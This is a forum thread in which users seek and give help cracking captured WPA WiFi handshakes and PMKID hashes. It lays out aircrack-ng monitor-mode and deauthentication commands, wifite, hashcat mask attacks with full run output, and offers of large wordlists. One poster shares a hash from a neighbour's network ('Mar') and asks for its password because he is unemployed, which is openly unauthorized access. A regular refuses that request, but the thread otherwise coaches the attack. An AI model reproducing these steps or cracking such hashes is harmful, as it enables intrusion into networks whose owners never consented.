Please help to crack cap file

Discussion in 'Dictionary, Password & Wordlists' started by 99gamingal, 7 Aug 2019.

  1. 99gamingal

    99gamingal Active Member

    Joined:
    7 Aug 2019
    Messages:
    13
    Likes Received:
    3
    Yes you are right. Now I have collected another cap ALBtelecom and luckily I found it password. But I'm interested in what wordlist to use. Have downloaded 13gb wordlist and without result. Words are english on wordlist. When I use ?l?l?l.. x8 , time estimated: around 19 days with 130000kh/s. How can I crack cap earlier ? Where can I found the right wordlists such as your folder wordlists "passlist1" ? thanks :)
     

    Attached Files:

  2. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    527
    -a 3 ?d?d?d?d?d?d?d?d for - for Geri.
    I said what are you using to capture handshakes?
    That corrupted handshake was collecting from many different networks. if you capture a handshake target just one network. Didn't you say you were using kali linux? then why are you on windows?
    My passwords lists are too big to upload, if you new people what to learn this stuff, you need to put the time in, research, research,research. :cigar:
     
    • Ok Ok x 1
  3. 99gamingal

    99gamingal Active Member

    Joined:
    7 Aug 2019
    Messages:
    13
    Likes Received:
    3
    For capture handshake, have used with kali these commands:
    iwconfig
    airmong-ng
    airmong-ng start wlan0mon
    airdump-ng wlan0
    airodump-ng -c "number" -b "mac" -w "name"
    New tab
    aireplay-ng -0 0 -a "mac" wlan0 .

    I haven't used kali linux with hashcat because for me it's the same speed 130kH/s .

    I have put the time in and research but my results are in english example one name in english its andy, in my language is andi etc. After research do not know where can I download a wordlist to do the job. :(
     
  4. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    527
    The first command should be:
    airmon-ng check kill
    airmon-ng start wlan0 (it most probably will use wlan0mon for monitor mode)
    the easiest way to capture handshake is using wifite. just type it in the console.
    wifite is automated

    also you need nvidia drivers for hashcat in kali linux. (only if kali is installed on hard drive)
    this WILL NOT work if you are using usb with persistence.
    https://docs.kali.org/general-use/install-nvidia-drivers-on-kali-linux

    the problem with some of your handshakes is, it is capturing alot of different networks. ;)
     
    #24 longshanks, 31 Aug 2019
    Last edited: 31 Aug 2019
    • Winner Winner x 1
  5. 99gamingal

    99gamingal Active Member

    Joined:
    7 Aug 2019
    Messages:
    13
    Likes Received:
    3
  6. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    527
    Take your pick :LOL:
    check my PM.
    i've got most of those over 200GB worth. :smuggrin:
     
    • Ok Ok x 1
  7. wifislax

    wifislax New Member

    Joined:
    31 Aug 2019
    Messages:
    5
    Likes Received:
    3
    I'm having trouble knowing how to create a handshake dictionary with Bssid attached, please help me, my computer is a core i3 2.4 hz and 12 gb ram,

    If you can know the password without the dictionary, I ask for help how to do it in slackware (wifislax 2.0)
     

    Attached Files:

  8. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    527
    • Funny Funny x 1
  9. wifislax

    wifislax New Member

    Joined:
    31 Aug 2019
    Messages:
    5
    Likes Received:
    3
    lfmao man , sry , but i need your help man,,,
    --- Double Post Merged, 1 Sep 2019, Original Post Date: 1 Sep 2019 ---
    I just installed kali and all lib (I have intel core i3 opencl with hashcat ok ... however, I'm reading with this command hash and pmkid

    ./hashcat -m 16800 1.16800 -a 3 -w 3 '? l? l? l? l? lt!'
    hashcat (v5.1.0) starting ...

    * Device # 1: Not a native Intel OpenCL runtime. Expect massive speed loss.
    You can use --force to override, but do not report related errors.
    OpenCL API (OpenCL 1.2 pocl 1.3 None + Asserts, LLVM 6.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform # 1 [The pocl project]
    ================================================== ================================================== ==================
    * Device # 1: pthread-IntelĀ® Core (TM) i3-3110M CPU @ 2.40GHz, skipped

    OpenCL API (OpenCL 2.1 LINUX) - Platform # 2 [Intel (R) Corporation]
    ================================================== ================
    * Device # 2: Intel (R) Core (TM) i3-3110M CPU @ 2.40GHz, 2973/11892 MB allocatable, 4MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Hardware monitoring interface not found on your system.
    Watchdog: Temperature abort trigger disabled.

    Host memory required for this attack: 65 MB

    armadillos [p] ause ypass [c] heckpoint [q] uit => s

    Session ..........: hashcat
    Status ...........: Running
    Hash.Name ........: WPA-PMKID-PBKDF2
    Hash.Target ......: 9c7da3ed4000: 088c2cfc4748: Mar
    Time.Started .....: Sat Aug 31 21:49:22 2019 (6 secs)
    Time.Estimated ...: Mon Sep 2 13:15:38 2019 (1 day, 15 hours)
    Guess.Mask .......:? L? L? L? L? L? Lt! [8]
    Guess.Who ......: 1/1 (100.00%)
    Speed # 2 .........: 2176 M / s (58.51ms) @ Accel: 512 Loops: 256 Thr: 1 Vec: 4
    Recovered ........: 0/1 (0.00%) Digests
    Progress .........: 10240/308915776 (0.00%)
    Rejected .........: 0/10240 (0.00%)
    Restore.Point ....: 0/11881376 (0.00%)
    Restore.Sub. # 2 ...: Salt: 0 Amplifier: 5-6 Iteration: 2304-2560
    Candidates # 2 ....: pariert! -> pjatert!

    armadillos [p] ause ypass [c] heckpoint [q] uit => s

    - one day and fifteen hours, can you help me, follow my pmkid (((626375ec21ce8b9891035faf5b63fa46 * 9c7da3ed4000 * 088c2cfc4748 * 4d6172))) help me please, I need the password because I am unemployed and this network (bssid Mar) is the most strong here near home, I await your help

    --- Double Post Merged, 1 Sep 2019 ---
    Sorry for sending multiple files, you could start with 9C-7D-A3-ED-40-00_handshake 1.cap, if it doesn't work out, choose another .cap file, all have 3 to 4 packets (containing Mar handshake), you need more information ?
     
    • Disagree Disagree x 1
  10. longshanks

    longshanks Well-Known Member
    VIP

    Joined:
    1 Jul 2016
    Messages:
    698
    Likes Received:
    527
    Stay off her thread please, i'm not going to help you. :p
     
  11. jtng67

    jtng67 Member

    Joined:
    31 Dec 2019
    Messages:
    5
    Likes Received:
    2
    Albtelecom-Vini cap is empty
     

Share This Page

Loading...